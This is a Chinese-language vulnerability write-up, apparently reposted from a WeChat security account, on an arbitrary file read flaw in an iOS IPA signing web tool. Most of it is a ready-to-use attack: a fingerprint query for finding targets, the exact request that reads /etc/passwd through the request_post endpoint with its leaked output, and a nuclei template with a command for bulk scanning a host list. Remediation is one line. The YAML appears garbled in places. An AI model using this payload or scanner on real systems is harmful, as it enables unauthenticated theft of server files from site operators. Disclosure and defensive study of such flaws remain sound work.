免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
苹果IOS端IPA签名工具任意文件读取漏洞
02
—
漏洞影响
苹果IOS端IPA签名工具
03
—
漏洞描述
苹果iOS端的IPA签名工具可以一键签名APP分身,支持安装未上架App Store的内测应用。用户可以在线批量导入源,若拥有自己的证书,签名功能完全免费且无任何限制,支持证书导入和文件分享,不限制签名数量。然而,该工具存在任意文件读取漏洞,攻击者可在未经身份验证的情况下访问系统重要文件,从而使网站面临极大的敏感数据泄露风险。
04
—
body="/assets/index/css/mobileSelect.css"
05
—
漏洞复现
漏洞POC如下,用浏览器访问即可复现
/api/index/request_post?url=file:///etc/passwd&post_data=1
数据包如下
GET /api/index/request_post?url=file:///etc/passwd&post_data=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
响应内容如下
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Date: Thu, 26 Sep 2024 13:04:12 GMT
Server: nginx
Vary: Accept-Encoding
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
漏洞复现完成
06
—
nuclei poc
poc文件内容如下
id: apple-ipa-request_post-fileread
info:
name: 苹果IOS端IPA签名工具任意文件读取漏洞
author: fgz
severity: high
'苹果iOS端的IPA签名工具可以一键签名APP分身,支持安装未上架App Store的内测应用。用户可以在线批量导入源,若拥有自己的证书,签名功能完全免费且无任何限制,支持证书导入和文件分享,不限制签名数量。然而,该工具存在任意文件读取漏洞,攻击者可在未经身份验证的情况下访问系统重要文件,从而使网站面临极大的敏感数据泄露风险。' :
tags: cve-2024
metadata:
1 :
body="/assets/index/css/mobileSelect.css" :
verified: true
http:
method: GET
path:
"{{BaseURL}}/api/index/request_post?url=file:///etc/passwd&post_data=1"
and :
matchers:
type: status
status:
200
type: word
words:
"root:x"
condition: and
part: body
运行POC
nuclei -t apple-ipa-request_post-fileread.yaml -l 1.txt
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):苹果IOS端IPA签名工具任意文件读取漏洞 批量扫描POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论